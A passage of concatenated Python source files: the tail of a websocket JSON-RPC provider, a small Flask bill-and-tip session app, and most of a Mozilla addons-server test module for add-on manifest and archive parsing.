self, exc_type: Type[BaseException], exc_val: BaseException, exc_tb: TracebackType
) -> None:
if exc_val is not None:
try:
await self.ws.close()
except Exception:
pass
self.ws = None
class WebsocketProvider(JSONBaseProvider):
logger = logging.getLogger("platon.providers.WebsocketProvider")
_loop = None
def __init__(
self,
endpoint_uri: Optional[Union[URI, str]] = None,
websocket_kwargs: Optional[Any] = None,
websocket_timeout: int = DEFAULT_WEBSOCKET_TIMEOUT,
) -> None:
self.endpoint_uri = URI(endpoint_uri)
self.websocket_timeout = websocket_timeout
if self.endpoint_uri is None:
self.endpoint_uri = get_default_endpoint()
if WebsocketProvider._loop is None:
WebsocketProvider._loop = _get_threaded_loop()
if websocket_kwargs is None:
websocket_kwargs = {}
else:
found_restricted_keys = set(websocket_kwargs.keys()).intersection(
RESTRICTED_WEBSOCKET_KWARGS
)
if found_restricted_keys:
raise ValidationError(
'{0} are not allowed in websocket_kwargs, '
'found: {1}'.format(RESTRICTED_WEBSOCKET_KWARGS, found_restricted_keys)
)
self.conn = PersistentWebSocket(
self.endpoint_uri, WebsocketProvider._loop, websocket_kwargs
)
super().__init__()
def __str__(self) -> str:
return "WS connection {0}".format(self.endpoint_uri)
async def coro_make_request(self, request_data: bytes) -> RPCResponse:
async with self.conn as conn:
await asyncio.wait_for(
conn.send(request_data),
timeout=self.websocket_timeout
)
return json.loads(
await asyncio.wait_for(
conn.recv(),
timeout=self.websocket_timeout
)
)
def make_request(self, method: RPCEndpoint, params: Any) -> RPCResponse:
self.logger.debug("Making request WebSocket. URI: %s, "
"Method: %s", self.endpoint_uri, method)
request_data = self.encode_rpc_request(method, params)
future = asyncio.run_coroutine_threadsafe(
self.coro_make_request(request_data),
WebsocketProvider._loop
)
return future.result()
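# Illustrative usage sketch (the RPC method name below is a placeholder, not taken
# from this module): requests are encoded, pushed onto the shared background event
# loop, and the synchronous caller blocks on the returned future.
# provider = WebsocketProvider("ws://127.0.0.1:8546")
# response = provider.make_request(RPCEndpoint("web3_clientVersion"), [])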
|
app.py
|
from flask import Flask, request, render_template, abort, redirect, url_for
import asyncio, random, threading
app = Flask(__name__)
sessions = {}
clear_loop = asyncio.new_event_loop()
def thread_clear():
asyncio.set_event_loop(clear_loop)
clear_loop.run_forever()
def clear_session(id):
del sessions[id]
clear_thread = threading.Thread(target=thread_clear)
clear_thread.start()
@app.route('/', methods=['GET'])
def index():
return render_template('index.html')
@app.route('/create', methods=['GET'])
def create():
return render_template('create.html')
@app.route('/', methods=['POST'])
def store():
try:
total = float(request.form['total'])
tax = float(request.form['tax'])
tips = float(request.form['tips'])
except (KeyError, ValueError):  # missing form field or non-numeric value
abort(400)
while True:
id = random.randint(1000, 9999)
if id not in sessions:
break
sessions[id] = {'id': id, 'total': total, 'tax': tax, 'tips': tips}
clear_loop.call_soon_threadsafe(clear_loop.call_later, 600, clear_session, id)
return redirect(url_for('show', id=id))
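# Note (describing the scheduling above): call_soon_threadsafe hands
# clear_loop.call_later(600, clear_session, id) to the background event loop
# running in clear_thread, so each stored session is dropped roughly ten minutes
# after it is created.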
@app.route('/<int:id>', methods=['GET'])
def show(id):
if id in sessions:
return render_template('show.html', **sessions[id])
abort(404)
@app.errorhandler(404)
def page_not_found(error):
return render_template('404.html'), 404
if __name__ == '__main__':
app.run()
|
test_utils.py
|
# -*- coding: utf-8 -*-
import json
import os
import shutil
import tempfile
import time
import zipfile
import multiprocessing
import contextlib
from unittest import mock
from django import forms
from django.conf import settings
from django.forms import ValidationError
from django.test.utils import override_settings
import lxml
import pytest
from defusedxml.common import EntitiesForbidden, NotSupportedError
from waffle.testutils import override_switch
from olympia import amo
from olympia.amo.tests import TestCase, user_factory
from olympia.amo.tests.test_helpers import get_addon_file
from olympia.applications.models import AppVersion
from olympia.files import utils
pytestmark = pytest.mark.django_db
def _touch(fname):
open(fname, 'a').close()
os.utime(fname, None)
class AppVersionsMixin(object):
@classmethod
def setUpTestData(cls):
cls.create_webext_default_versions()
@classmethod
def create_appversion(cls, name, version):
return AppVersion.objects.create(application=amo.APPS[name].id,
version=version)
@classmethod
def create_webext_default_versions(cls):
cls.create_appversion('firefox', '36.0') # Incompatible with webexts.
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID)
cls.create_appversion(
'android', amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
cls.create_appversion(
'android', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion(
'firefox', amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
cls.create_appversion(
'android', amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
class TestExtractor(AppVersionsMixin, TestCase):
def test_no_manifest(self):
fake_zip = utils.make_xpi({'dummy': 'dummy'})
with self.assertRaises(utils.NoManifestFound) as exc:
utils.Extractor.parse(fake_zip)
assert isinstance(exc.exception, forms.ValidationError)
assert exc.exception.message == (
'No install.rdf or manifest.json found')
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_parse_install_rdf(self, rdf_extractor, manifest_json_extractor):
fake_zip = utils.make_xpi({'install.rdf': ''})
utils.Extractor.parse(fake_zip)
assert rdf_extractor.called
assert not manifest_json_extractor.called
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_ignore_package_json(self, rdf_extractor, manifest_json_extractor):
# Previously we preferred `package.json` to `install.rdf` which
# we don't anymore since
# https://github.com/mozilla/addons-server/issues/2460
fake_zip = utils.make_xpi({'install.rdf': '', 'package.json': ''})
utils.Extractor.parse(fake_zip)
assert rdf_extractor.called
assert not manifest_json_extractor.called
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_parse_manifest_json(self, rdf_extractor, manifest_json_extractor):
fake_zip = utils.make_xpi({'manifest.json': ''})
utils.Extractor.parse(fake_zip)
assert not rdf_extractor.called
assert manifest_json_extractor.called
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_prefers_manifest_to_install_rdf(self, rdf_extractor,
manifest_json_extractor):
fake_zip = utils.make_xpi({'install.rdf': '', 'manifest.json': ''})
utils.Extractor.parse(fake_zip)
assert not rdf_extractor.called
assert manifest_json_extractor.called
@mock.patch('olympia.files.utils.os.path.getsize')
def test_static_theme_max_size(self, getsize_mock):
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE
manifest = utils.ManifestJSONExtractor(
'/fake_path', '{"theme": {}}').parse()
# Calling to check it doesn't raise.
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
# Increase the size though and it should raise an error.
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE + 1
with pytest.raises(forms.ValidationError) as exc:
utils.check_xpi_info(manifest, xpi_file=mock.Mock())
assert (
exc.value.message ==
u'Maximum size for WebExtension themes is 7.0 MB.')
# double-check that only static themes are size-limited
manifest = utils.ManifestJSONExtractor(
'/fake_path', '{}').parse()
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
class TestRDFExtractor(TestCase):
def setUp(self):
self.firefox_versions = [
AppVersion.objects.create(application=amo.APPS['firefox'].id,
version='38.0a1'),
AppVersion.objects.create(application=amo.APPS['firefox'].id,
version='43.0'),
]
self.thunderbird_versions = [
AppVersion.objects.create(application=amo.APPS['android'].id,
version='42.0'),
AppVersion.objects.create(application=amo.APPS['android'].id,
version='45.0'),
]
def test_apps_disallow_thunderbird_and_seamonkey(self):
zip_file = utils.SafeZip(get_addon_file(
'valid_firefox_and_thunderbird_addon.xpi'))
extracted = utils.RDFExtractor(zip_file).parse()
apps = extracted['apps']
assert len(apps) == 1
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '38.0a1'
assert apps[0].max.version == '43.0'
class TestManifestJSONExtractor(AppVersionsMixin, TestCase):
def parse(self, base_data):
return utils.ManifestJSONExtractor(
'/fake_path', json.dumps(base_data)).parse()
def test_instanciate_without_data(self):
"""Without data, we load the data from the file path."""
data = {'id': 'some-id'}
fake_zip = utils.make_xpi({'manifest.json': json.dumps(data)})
extractor = utils.ManifestJSONExtractor(zipfile.ZipFile(fake_zip))
assert extractor.data == data
def test_guid_from_applications(self):
"""Use applications>gecko>id for the guid."""
assert self.parse(
{'applications': {
'gecko': {
'id': 'some-id'}}})['guid'] == 'some-id'
def test_guid_from_browser_specific_settings(self):
"""Use applications>gecko>id for the guid."""
assert self.parse(
{'browser_specific_settings': {
'gecko': {
'id': 'some-id'}}})['guid'] == 'some-id'
def test_name_for_guid_if_no_id(self):
"""Don't use the name for the guid if there is no id."""
assert self.parse({'name': 'addon-name'})['guid'] is None
def test_type(self):
"""manifest.json addons are always ADDON_EXTENSION."""
assert self.parse({})['type'] == amo.ADDON_EXTENSION
def test_is_restart_required(self):
"""manifest.json addons never requires restart."""
assert self.parse({})['is_restart_required'] is False
def test_name(self):
"""Use name for the name."""
assert self.parse({'name': 'addon-name'})['name'] == 'addon-name'
def test_version(self):
"""Use version for the version."""
assert self.parse({'version': '23.0.1'})['version'] == '23.0.1'
def test_homepage(self):
"""Use homepage_url for the homepage."""
assert (
self.parse({'homepage_url': 'http://my-addon.org'})['homepage'] ==
'http://my-addon.org')
def test_summary(self):
"""Use description for the summary."""
assert (
self.parse({'description': 'An addon.'})['summary'] == 'An addon.')
def test_invalid_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': 'A',
'id': '@invalid_strict_min_version'
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert (
exc.value.message ==
'Lowest supported "strict_min_version" is 42.0.')
def test_unknown_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': '76.0',
'id': '@unknown_strict_min_version'
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == (
u'Unknown "strict_min_version" 76.0 for Firefox')
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_min_version'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_strict_min_version_needs_to_be_higher_then_42_if_specified(self):
"""strict_min_version needs to be higher than 42.0 if specified."""
data = {
'applications': {
'gecko': {
'strict_min_version': '36.0',
'id': '@too_old_strict_min_version'
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert (
exc.value.message ==
'Lowest supported "strict_min_version" is 42.0.')
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '47.0')
firefox_max_version = self.create_appversion('firefox', '47.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=47.0',
'strict_max_version': '=47.*',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min == firefox_min_version
assert app.max == firefox_max_version
# We have no way of specifying a different version for Android when an
# explicit version number is provided... That being said, we know that
# 47.0 is too low for Android, so we silently cap it at 48.0. That
# forces us to also change the max version for android.
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
# But if 'browser_specific_settings' is used, it's higher min version.
data = {'browser_specific_settings': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_is_webextension(self):
assert self.parse({})['is_webextension']
def test_allow_static_theme_waffle(self):
manifest = utils.ManifestJSONExtractor(
'/fake_path', '{"theme": {}}').parse()
utils.check_xpi_info(manifest)
assert self.parse({'theme': {}})['type'] == amo.ADDON_STATICTHEME
def test_extensions_dont_have_strict_compatibility(self):
assert self.parse({})['strict_compatibility'] is False
def test_moz_signed_extension_no_strict_compat(self):
addon = amo.tests.addon_factory()
user = amo.tests.user_factory(email='foo@mozilla.com')
file_obj = addon.current_version.all_files[0]
file_obj.update(is_mozilla_signed_extension=True)
fixture = (
'src/olympia/files/fixtures/files/'
'legacy-addon-already-signed-0.1.0.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
parsed = utils.parse_xpi(file_obj.file_path, user=user)
assert parsed['is_mozilla_signed_extension']
assert not parsed['strict_compatibility']
def test_moz_signed_extension_reuse_strict_compat(self):
addon = amo.tests.addon_factory()
user = amo.tests.user_factory(email='foo@mozilla.com')
file_obj = addon.current_version.all_files[0]
file_obj.update(is_mozilla_signed_extension=True)
fixture = (
'src/olympia/files/fixtures/files/'
'legacy-addon-already-signed-strict-compat-0.1.0.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
parsed = utils.parse_xpi(file_obj.file_path, user=user)
assert parsed['is_mozilla_signed_extension']
# We set `strictCompatibility` in install.rdf
assert parsed['strict_compatibility']
@mock.patch('olympia.addons.models.resolve_i18n_message')
def test_mozilla_trademark_disallowed(self, resolve_message):
resolve_message.return_value = 'Notify Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = (
'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
with pytest.raises(forms.ValidationError) as exc:
utils.parse_xpi(file_obj.file_path)
assert dict(exc.value.messages)['en-us'].startswith(
u'Add-on names cannot contain the Mozilla or'
)
@mock.patch('olympia.addons.models.resolve_i18n_message')
@override_switch('content-optimization', active=False)
def test_mozilla_trademark_for_prefix_allowed(self, resolve_message):
resolve_message.return_value = 'Notify for Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = (
'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
utils.parse_xpi(file_obj.file_path)
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
WebExtensions are allowed to omit `applications[/gecko]`, and we
previously skipped defaulting to any `AppVersion` when it was not
defined. That resulted in none of our platforms being selectable.
See https://github.com/mozilla/addons-server/issues/2586 and
probably many others.
"""
data = {}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_handle_utf_bom(self):
manifest = b'\xef\xbb\xbf{"manifest_version": 2, "name": "..."}'
parsed = utils.ManifestJSONExtractor(None, manifest).parse()
assert parsed['name'] == '...'
def test_raise_error_if_no_optional_id_support(self):
"""
We only support optional ids in Firefox 48+ and will throw an error
otherwise.
"""
data = {
'applications': {
'gecko': {
'strict_min_version': '42.0',
'strict_max_version': '49.0',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)['apps']
assert (
exc.value.message ==
'Add-on ID is required for Firefox 47 and below.')
def test_comments_are_allowed(self):
json_string = """
{
// Required
"manifest_version": 2,
"name": "My Extension",
"version": "versionString",
// Recommended
"default_locale": "en",
"description": "A plain text description"
}
"""
manifest = utils.ManifestJSONExtractor(
'/fake_path', json_string).parse()
assert manifest['is_webextension'] is True
assert manifest.get('name') == 'My Extension'
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# We shouldn't skip adding specific apps to the WebExtension
# regardless of any potential incompatibility, e.g.
# browser_specific_settings is only supported from Firefox 48.0
# onwards; now if the user specifies strict_min_version as 42.0
# we shouldn't skip the app because of that. Instead we override the
# value with the known min version that started supporting that.
data = {
'browser_specific_settings': {
'gecko': {
'strict_min_version': '42.0',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
def test_devtools_page(self):
json_string = """
{
// Required
"manifest_version": 2,
"name": "My Extension",
"version": "versionString",
// Recommended
"default_locale": "en",
"description": "A plain text description",
"devtools_page": "devtools/my-page.html"
}
"""
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json_string).parse()
assert parsed_data['devtools_page'] == "devtools/my-page.html"
class TestLanguagePackAndDictionaries(AppVersionsMixin, TestCase):
def test_parse_langpack(self):
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
self.create_appversion('android', '60.0')
self.create_appversion('android', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '60.0'
assert apps[0].max.version == '60.*'
def test_parse_langpack_not_targeting_versions_explicitly(self):
data = {
'applications': {
'gecko': {
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '42.0'
# The linter should force the langpack to have a strict_max_version,
# so the value here doesn't matter much.
assert apps[0].max.version == '*'
def test_parse_dictionary(self):
self.create_appversion('firefox', '61.0')
data = {
'applications': {
'gecko': {
'id': '@dict'
}
},
'dictionaries': {'en-US': '/path/to/en-US.dic'}
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_DICT
assert parsed_data['strict_compatibility'] is False
assert parsed_data['is_webextension'] is True
assert parsed_data['target_locale'] == 'en-US'
apps = parsed_data['apps']
assert len(apps) == 1 # Dictionaries are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '61.0'
assert apps[0].max.version == '*'
def test_parse_broken_dictionary(self):
data = {
'dictionaries': {}
}
with self.assertRaises(forms.ValidationError):
utils.ManifestJSONExtractor('/fake_path', json.dumps(data)).parse()
def test_check_xpi_info_langpack_submission_restrictions(self):
user = user_factory()
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path.xpi', json.dumps(data)).parse()
with self.assertRaises(ValidationError):
# Regular users aren't allowed to submit langpacks.
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
# Shouldn't raise for users with proper permissions
self.grant_permission(user, ':'.join(amo.permissions.LANGPACK_SUBMIT))
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
class TestManifestJSONExtractorStaticTheme(TestManifestJSONExtractor):
def parse(self, base_data):
if 'theme' not in base_data.keys():
base_data.update(theme={})
return super(
TestManifestJSONExtractorStaticTheme, self).parse(base_data)
def test_type(self):
assert self.parse({})['type'] == amo.ADDON_STATICTHEME
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
Override this because static themes have a higher default version.
"""
data = {}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '66.0')
firefox_max_version = self.create_appversion('firefox', '66.*')
android_min_version = self.create_appversion('android', '66.0')
android_max_version = self.create_appversion('android', '66.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=66.0',
'strict_max_version': '=66.*',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min == firefox_min_version
assert apps[0].max == firefox_max_version
assert apps[1].appdata == amo.ANDROID
assert apps[1].min == android_min_version
assert apps[1].max == android_max_version
def test_theme_json_extracted(self):
# Check theme data is extracted from the manifest and returned.
data = {'theme': {'colors': {'tab_background_text': "#3deb60"}}}
assert self.parse(data)['theme'] == data['theme']
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_min_version'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# In the parent class this method would bump the min_version to 48.0
# because that's the first version to support
# browser_specific_settings, but in static themes we bump it even
# higher because of the minimum version when we started supporting
# static themes themselves.
data = {
'browser_specific_settings': {
'gecko': {
'strict_min_version': '42.0',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
@pytest.mark.parametrize('filename, expected_files', [
('webextension_no_id.xpi', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('webextension_no_id.zip', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('webextension_no_id.tar.gz', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('webextension_no_id.tar.bz2', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('search.xml', [
'search.xml',
])
])
def test_extract_extension_to_dest(filename, expected_files):
extension_file = 'src/olympia/files/fixtures/files/{fname}'.format(
fname=filename)
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
temp_folder = utils.extract_extension_to_dest(extension_file)
assert sorted(os.listdir(temp_folder)) == expected_files
# fsync isn't called by default
assert not fsync_mock.called
@pytest.mark.parametrize('filename', [
'webextension_no_id.xpi', 'webextension_no_id.zip',
'webextension_no_id.tar.bz2', 'webextension_no_id.tar.gz', 'search.xml',
])
def test_extract_extension_to_dest_call_fsync(filename):
extension_file = 'src/olympia/files/fixtures/files/{fname}'.format(
fname=filename)
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
utils.extract_extension_to_dest(extension_file, force_fsync=True)
        # fsync is called when force_fsync=True is passed
assert fsync_mock.called
def test_extract_extension_to_dest_non_existing_archive():
extension_file = 'src/olympia/files/fixtures/files/doesntexist.zip'
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(FileNotFoundError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
def test_extract_extension_to_dest_invalid_archive():
extension_file = (
'src/olympia/files/fixtures/files/invalid-cp437-encoding.xpi'
)
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(forms.ValidationError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
@pytest.fixture
def file_obj():
addon = amo.tests.addon_factory()
addon.update(guid='xxxxx')
version = addon.current_version
return version.all_files[0]
@pytest.mark.django_db
def test_bump_version_in_manifest_json(file_obj):
AppVersion.objects.create(application=amo.FIREFOX.id,
version=amo.DEFAULT_WEBEXT_MIN_VERSION)
AppVersion.objects.create(application=amo.FIREFOX.id,
version=amo.DEFAULT_WEBEXT_MAX_VERSION)
AppVersion.objects.create(application=amo.ANDROID.id,
version=amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
AppVersion.objects.create(application=amo.ANDROID.id,
version=amo.DEFAULT_WEBEXT_MAX_VERSION)
with amo.tests.copy_file(
'src/olympia/files/fixtures/files/webextension.xpi',
file_obj.file_path):
utils.update_version_number(file_obj, '0.0.1.1-signed')
parsed = utils.parse_xpi(file_obj.file_path)
assert parsed['version'] == '0.0.1.1-signed'
def test_extract_translations_simple(file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
messages = utils.extract_translations(file_obj)
assert list(sorted(messages.keys())) == [
'de', 'en-US', 'ja', 'nb-NO', 'nl', 'ru', 'sv-SE']
@mock.patch('olympia.files.utils.zipfile.ZipFile.read')
def test_extract_translations_fail_silent_invalid_file(read_mock, file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
read_mock.side_effect = KeyError
# Does not raise an exception
utils.extract_translations(file_obj)
read_mock.side_effect = IOError
        # Does not raise an exception either
utils.extract_translations(file_obj)
        # We don't fail on invalid JSON either; that's the addons-linter's domain
read_mock.side_effect = ValueError
utils.extract_translations(file_obj)
# But everything else...
read_mock.side_effect = TypeError
with pytest.raises(TypeError):
utils.extract_translations(file_obj)
def test_get_all_files():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
assert utils.get_all_files(tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
shutil.rmtree(tempdir)
assert not os.path.exists(tempdir)
def test_get_all_files_strip_prefix_no_prefix_silent():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
assert utils.get_all_files(tempdir, strip_prefix=tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
    # prefix is simply prepended to every returned path.
assert utils.get_all_files(tempdir, prefix='/foo/bar') == [
'/foo/bar' + os.path.join(tempdir, 'dir1'),
